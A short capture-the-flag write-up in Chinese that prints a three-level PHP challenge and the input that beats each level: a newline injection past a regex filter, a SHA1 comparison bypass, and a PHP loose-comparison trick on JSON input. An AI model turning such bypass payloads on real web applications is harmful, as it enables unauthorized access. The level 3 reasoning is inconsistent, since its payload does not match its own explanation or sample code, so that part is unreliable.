源码:
<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){
$aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);
if(preg_match('/pass_the_level_1#/', $aaa)){
echo "here is level 2";
if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
if ($_POST['admin'] == $_POST['root_pwd'])
echo '<p>The level 2 can not pass!</p>';
// START FORM PROCESSING
else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
echo "here is level 3,do you kown how to overcome it?";
if (isset($_POST['level_3'])) {
$level_3 = json_decode($_POST['level_3']);
if ($level_3->result == $result) {
echo "success:".$flag;
}
else {
echo "you never beat me!";
}
}
else{
echo "out";
}
}
else{
die("no");
}
// perform validations on the form data
}
else{
echo '<p>out!</p>';
}
}
else{
echo 'nonono!';
}
echo '<hr>';
}
?>
level 1
aaa=%0apass_the_level_1%23
绕过方式为换行符绕过,%0a
是换行符,%23
是“#”符号,如果不进行编码会导致无法发送请求
level 2
sha1的强碰撞,MD5/SHA1比较漏洞 弱比较/弱碰撞、强比较、强碰撞,注意要用burpsuite进行传参
level 3
php在进行整形与字符串的弱类型比较时,会将字符串解析为“0”,故我们可以构造这样的payload level_3={"result":"555"}
比较的示例代码
<?php
$a = "asdf";
$b = json_decode('{"result":0}');
if ($a == $b->result){
echo "ok\n";
}